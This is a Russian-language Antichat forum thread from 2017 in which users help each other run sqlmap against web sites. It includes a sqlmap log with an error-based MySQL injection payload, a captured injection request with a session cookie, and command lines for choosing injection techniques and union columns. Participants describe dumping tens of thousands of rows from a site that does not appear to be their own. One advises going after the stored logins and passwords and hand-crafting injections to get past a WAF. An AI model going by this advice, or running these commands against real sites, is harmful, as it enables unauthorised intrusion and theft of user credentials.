ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.05.2017, 11:03
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме:
43449
Репутация:
1
|
|
[08:44:51] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2, PHP 5.5.38
back-end DBMS: MySQL >= 5.0
[08:44:51] [INFO] fetching database names
[08:44:51] [DEBUG] resuming configuration option 'code' (200)
[08:44:51] [DEBUG] searching for error chunk length...
[08:44:51] [PAYLOAD] 1 AND (SELECT 2283 FROM(SELECT COUNT(*),CONCAT(0x71786b7071,(SELECT REPEAT(0x34,1024)),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
[08:45:22] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[08:45:22] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
[08:45:53] [DEBUG] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[08:46:23] [DEBUG] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[08:46:54] [CRITICAL] connection timed out to the target URL or proxy
[*] shutting down at 08:46:54
Не хочет мне бд показывать )) Уже и с прокси пробывал и тд.Что делать?
|
|
|
10.05.2017, 20:53
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме:
43449
Репутация:
1
|
|
Сообщение от spize0r
↑
Не понял, cms на php. На одном сайте проходит update, на другом нет. Как я понял завист от настройки на сервере? Но вопрос : может ли чтото измениться, если поиграться с параметрами, или это уже все?
Зависит от привилегий пользователя под которым ты сейчас.На первом сайте ты под админом на втором нет. --is-dba
|
|
|
|
11.05.2017, 15:25
|
|
Познающий
Регистрация: 02.04.2016
Сообщений: 40
Провел на форуме:
11491
Репутация:
4
|
|
Сообщение от brown
↑
Зависит от привилегий пользователя под которым ты сейчас.На первом сайте ты под админом на втором нет. --is-dba
не соглашусь. --is-dba везде False. это влияет только на возможность работы с файловой системой. а вотредактирование записей в бд может быть может нет. возможно я как то не так запускаю тесты. хотлделал и с максимальными параметрами --level и --risk. все однно. одна и таже cms на разных хостингах . на одном редактирование проходят на других нет.
|
|
|
|
12.05.2017, 13:08
|
|
Новичок
Регистрация: 20.02.2016
Сообщений: 10
Провел на форуме:
2307
Репутация:
0
|
|
Сообщение от RaWaS
↑
Неправильно вставляешь ссылку
Подскажи, как правильно ее вставлять в SQLMAP
Например, выдало вот такое:
Код:
GET /video.php?id=-1'%20OR%203*2*1%3d6%20AND%20000432%3d000432%20--%20 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://site.com/
Cookie: PHPSESSID=4n4rsiu4gpbich32fllrl26gr6
Host: site.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Как правильно вставить ссылку?
|
|
|
|
12.05.2017, 13:28
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от MollizZz
↑
Подскажи, как правильно ее вставлять в SQLMAP
Например, выдало вот такое:
Код:
GET /video.php?id=-1'%20OR%203*2*1%3d6%20AND%20000432%3d000432%20--%20 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://site.com/
Cookie: PHPSESSID=4n4rsiu4gpbich32fllrl26gr6
Host: site.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Как правильно вставить ссылку?
что то около того
-u 'site.com/video.php?id=-1' --cookie="PHPSESSID=4n4rsiu4gpbich32fllrl26gr6" --random-agent -v 3
если нужен вектор именно boolean то добавь ещё флаг --technique=B
|
|
|
|
12.05.2017, 13:32
|
|
Новичок
Регистрация: 20.02.2016
Сообщений: 10
Провел на форуме:
2307
Репутация:
0
|
|
Сообщение от t0ma5
↑
что то около того
-u 'site.com/video.php?id=-1' --cookie="PHPSESSID=4n4rsiu4gpbich32fllrl26gr6" --random-agent -v 3
если нужен вектор именно boolean то добавь ещё флаг --technique=B
Пару часов назад спорил с одним товарищем по поводу техник
Суть спора, что техники надо использовать только EU, так как то же самый --technique=B доступ к БД и колонкам откроет, но сливать колонки будет по 1 символу в 2-3 секунды
Он рекомендует только --technique=EU
Так ли это?
|
|
|
|
12.05.2017, 13:34
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от MollizZz
↑
Пару часов назад спорил с одним товарищем по поводу техник
Суть спора, что техники надо использовать только EU, так как то же самый --technique=B доступ к БД и колонкам откроет, но сливать колонки будет по 1 символу в 2-3 секунды
Он рекомендует только --technique=EU
Так ли это?
любая техника достаёт информацию из базы, вопрос только во времени
|
|
|
|
12.05.2017, 13:38
|
|
Новичок
Регистрация: 20.02.2016
Сообщений: 10
Провел на форуме:
2307
Репутация:
0
|
|
Сообщение от t0ma5
↑
любая техника достаёт информацию из базы, вопрос только во времени
Я лично вчера проводил эксперимент с одним сайтом
Без каких либо техник уязвимость была вскрыта. Доступ к БД был открыт (правда начало сливать 1 символ в несколько секунд)
С --technique=EU - не вскрыл
Сайтец хороший, но те же самые 60к строк нужных колонок будет сливать месяц точно. Забросил в итоге
|
|
|
|
12.05.2017, 13:49
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от MollizZz
↑
Я лично вчера проводил эксперимент с одним сайтом
Без каких либо техник уязвимость была вскрыта. Доступ к БД был открыт (правда начало сливать 1 символ в несколько секунд)
С --technique=EU - не вскрыл
Сайтец хороший, но те же самые 60к строк нужных колонок будет сливать месяц точно. Забросил в итоге
sqlmap не всегда сам нормально находит реализацию union вектору, лучше ему подсказывать
--union-cols количество колонок
--prefix --suffix начало и конец строки для инъекции
может там waf был, зря забросил, нужно было попробовать раскрутить скуль руками
"но те же самые 60к строк нужных колонок будет сливать месяц точно" стоило попробовать получить полноценный доступ к бд поискав другие лазейки, к тому же какой никакой доступ к базе есть, а там зачастую хранятся логины/пароли
|
|
|
|
12.05.2017, 13:54
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
4776
Репутация:
0
|
|
Сообщение от t0ma5
↑
sqlmap не всегда сам нормально находит реализацию union вектору, лучше ему подсказывать
--union-cols количество колонок
--prefix --suffix начало и конец строки для инъекции
может там waf был, зря забросил, нужно было попробовать раскрутить скуль руками
"но те же самые 60к строк нужных колонок будет сливать месяц точно" стоило попробовать получить полноценный доступ к бд поискав другие лазейки, к тому же какой никакой доступ к базе есть, а там зачастую хранятся логины/пароли
Кхм , можешь обьяснить на примере самой обычной скули ,как правильно юзать --prefix --suffix
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
